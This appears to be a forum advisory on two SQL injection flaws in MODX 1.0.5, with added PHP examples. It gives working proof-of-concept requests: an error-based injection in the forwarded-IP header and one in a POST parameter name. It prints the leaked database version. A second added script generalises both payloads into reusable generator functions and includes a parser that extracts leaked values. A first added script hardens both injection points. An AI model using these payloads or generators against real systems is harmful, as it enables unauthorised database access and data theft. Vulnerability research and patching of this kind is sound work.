TeamPro
08.08.2012, 05:29
Author: TeamPRO (c)
Date: 22.07.2012
Patch available: -
Blind SQL Injection
Requirements: user account / magic_quotes = off (the payload needs a literal single quote)
Vulnerable script: /modx-1.0.5/assets/snippets/weblogin/weblogin.inc.php
PHP:
if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR");
else $ip = "UNKNOWN";
$_SESSION['ip'] = $ip;
$itemid = isset($_REQUEST['id']) && is_numeric($_REQUEST['id']) ? $_REQUEST['id'] : 'NULL';
$lasthittime = time();
$a = 998;
if ($a != 1) {
    // $ip is taken verbatim from a client-supplied header and concatenated into the query unescaped
    $sql = "REPLACE INTO $dbase.`" . $table_prefix . "active_users` (internalKey, username, lasthit, action, id, ip) values(-" . $_SESSION['webInternalKey'] . ", '" . $_SESSION['webShortname'] . "', '" . $lasthittime . "', '" . $a . "', " . $itemid . ", '$ip')";
    if (!$rs = $modx->dbQuery($sql)) {
        // the MySQL error for the failing statement is shown to the client, which the PoC relies on
        $output = "error replacing into active users! SQL: " . $sql;
        return;
    }
}
PoC:
Log in, then send any further request carrying your session cookies with the payload in the forwarded-IP header (the snippet reads Client-IP first, then X-Forwarded-For). The MySQL error for the failed REPLACE is returned in the response, so the name_const() trick leaks the value directly in the error text.
Code:
GET or POST http://localhost/modx-1.0.5/
X_FORWARDED_FOR: 127.0.0.1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'dasa
Cookie: [mycookies]
--->
Code:
Execution of a query to the database failed - Duplicate column name '5.0.92-log'
Blind SQL Injection
Requirements: administrator account (the payload contains no quotes, so magic_quotes does not matter here)
Vulnerable script: /modx-1.0.5/assets/modules/docmanager/classes/dm_backend.class.php
PHP:
foreach ($_POST as $key => $value) {
    if (substr($key, 0, 10) == 'update_tv_' && $value == 'yes') {
        // whatever follows the update_tv_ prefix of the parameter NAME is appended to the WHERE clause unquoted
        $tvKeyName = substr($key, 10);
        $typeSQL = $this->modx->db->select('*', $this->modx->getFullTableName('site_tmplvars'), 'id=' . $tvKeyName . '');
        $row = $this->modx->db->getRow($typeSQL);
        // rest of the loop body as in the original file
    }
}
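The following is an added example, not MODX code and not a vendor patch (the advisory lists none): both injection points above hardened. The helper names clientIp, tvIdFromKey and updatedTvIds are chosen here; the request data at the bottom is constructed from the PoC payloads so the file runs offline with the PHP CLI.

```php
<?php
// Added example (not MODX code, not a vendor patch): the two injection points hardened.
// Helper names (clientIp, tvIdFromKey, updatedTvIds) are chosen here. Both fixes reject
// attacker-shaped input before it reaches SQL instead of relying on magic_quotes.

// weblogin.inc.php: accept only a syntactically valid IP literal from the proxy headers,
// in the same priority order as the original. Anything else falls through to the next
// header and finally to "UNKNOWN", so the value can never close the quote in the query.
// Client-IP / X-Forwarded-For remain client-controlled even when they parse as an IP;
// treat them as trustworthy only behind a proxy you operate.
function clientIp(array $server): string
{
    foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'] as $key) {
        if (empty($server[$key])) {
            continue;
        }
        // X-Forwarded-For may carry a comma-separated chain; only the first hop is used
        $candidate = trim(explode(',', (string) $server[$key])[0]);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return 'UNKNOWN';
}

// dm_backend.class.php: the template-variable id is an integer column, so parse the
// parameter NAME as exactly "update_tv_<digits>" and ignore everything else. The
// original substr($key, 10) hands "1/**/or/**/(select ...)" straight to the WHERE clause.
function tvIdFromKey(string $key): ?int
{
    return preg_match('/^update_tv_(\d{1,10})$/', $key, $m) ? (int) $m[1] : null;
}

// Replacement for the foreach loop in the advisory: returns the ids that are safe to use
// as 'id=' . $id (an int cannot carry SQL). Values are compared strictly so an
// array-valued parameter (update_tv_3[]=yes) is not accepted either.
function updatedTvIds(array $post): array
{
    $ids = [];
    foreach ($post as $key => $value) {
        $id = tvIdFromKey((string) $key);
        if ($id !== null && $value === 'yes') {
            $ids[] = $id;
        }
    }
    return $ids;
}

// Self-check with the advisory's own payloads (constructed request data, no server needed).
$xffPayload = "127.0.0.1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'dasa";
assert(clientIp(['HTTP_X_FORWARDED_FOR' => $xffPayload, 'REMOTE_ADDR' => '10.0.0.5']) === '10.0.0.5');
assert(clientIp(['HTTP_CLIENT_IP' => $xffPayload]) === 'UNKNOWN');
assert(clientIp(['HTTP_X_FORWARDED_FOR' => '203.0.113.9, 10.0.0.1']) === '203.0.113.9');

$post = [
    'update_tv_3' => 'yes',
    'update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1)x)' => 'yes',
    'update_tv_7' => 'no',
];
assert(updatedTvIds($post) === [3]);
echo "both injection points rejected the PoC input\n";
```

With $ip constrained this way the REPLACE statement can stay as written for that column. Two further points a reviewer would raise on the same line: cast $itemid with (int) rather than trusting is_numeric() (which also accepts leading whitespace and exponent forms), and pass $_SESSION['webShortname'] through the DB layer's string escaper, since it is another string interpolated into the statement.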
PoC (the injection sits in the parameter name, not its value; /**/ stands in for spaces because PHP rewrites spaces and dots in request-variable names to underscores):
Code:
POST http://localhost/modx-1.0.5/manager/index.php?a=112&id=1
tid=3&pids=1&template_id=3&tabAction=changeTV&update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(version(),floor(rand(0)*2)))=yes
--->
Code:
Execution of a query to the database failed - Duplicate entry '5.0.92-log1' for key 'group_key'
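The following is an added example, not part of TeamPRO's post: the two PoC payloads generalised into reusable PHP functions, plus the parser that reads the leaked value back out of the MODX error page. The function names are chosen here, and the sample responses are constructed from the two error lines quoted above, so the file runs offline with the PHP CLI.

```php
<?php
// Added example (not from TeamPRO's post): the two PoC payloads generalised into
// reusable functions, plus the parser that reads the leaked value back out of the
// MODX error page. Function names and sample responses are constructed here; the
// responses are copied from the error lines quoted in the advisory.

// Shape 1 (weblogin, string context in the proxy-IP header): two name_const() columns
// with the same name inside a derived table make MySQL fail with
// "Duplicate column name '<value>'". name_const() only accepts constant arguments, so
// this shape works for version(), user(), database() and literals, not for subqueries.
function nameConstPayload(string $expr): string
{
    return "127.0.0.1'and(select*from(select(name_const($expr,1)),name_const($expr,1))a)and'dasa";
}

// Shape 2 (docmanager, numeric context inside a POST parameter NAME): the
// floor(rand(0)*2) GROUP BY collision fails with "Duplicate entry '<value>1' for key
// 'group_key'" and accepts any expression, subqueries included. Spaces become /**/
// because PHP rewrites spaces and dots in request-variable names to underscores, which
// also means the expression itself must not contain a dot (no t.col qualifiers).
function groupByPayload(string $expr): string
{
    $expr = str_replace(' ', '/**/', $expr);
    return "update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat($expr,floor(rand(0)*2)))=yes";
}

// Read the leaked value out of either error. Returns null when no usable error is
// present, which is also what a correctly fixed target answers.
function extractFromError(string $body): ?string
{
    if (preg_match("/Duplicate column name '([^']*)'/", $body, $m)) {
        return $m[1];
    }
    if (preg_match("/Duplicate entry '([^']*)' for key/", $body, $m)) {
        return substr($m[1], 0, -1);   // drop the 0/1 appended by floor(rand(0)*2)
    }
    return null;
}

// Constructed responses, taken from the two error lines quoted in the advisory.
$webloginResponse   = "Execution of a query to the database failed - Duplicate column name '5.0.92-log'";
$docmanagerResponse = "Execution of a query to the database failed - Duplicate entry '5.0.92-log1' for key 'group_key'";

assert(extractFromError($webloginResponse) === '5.0.92-log');
assert(extractFromError($docmanagerResponse) === '5.0.92-log');
assert(extractFromError('<html>login ok</html>') === null);

// What the two requests carry: shape 1 goes into the forwarded-IP header of any
// authenticated request, shape 2 is the raw body of the POST to manager/index.php?a=112&id=1.
echo "X_FORWARDED_FOR: ", nameConstPayload('version()'), "\n";
echo "tid=3&pids=1&template_id=3&tabAction=changeTV&", groupByPayload('(select user())'), "\n";
```

Shape 2 is the one to reach for when the target expression is a subquery; shape 1 is cheaper but limited by name_const()'s constant-argument rule. Both depend entirely on the MySQL error being echoed to the client, so disabling verbose database errors in the manager closes the oracle even before the queries themselves are fixed.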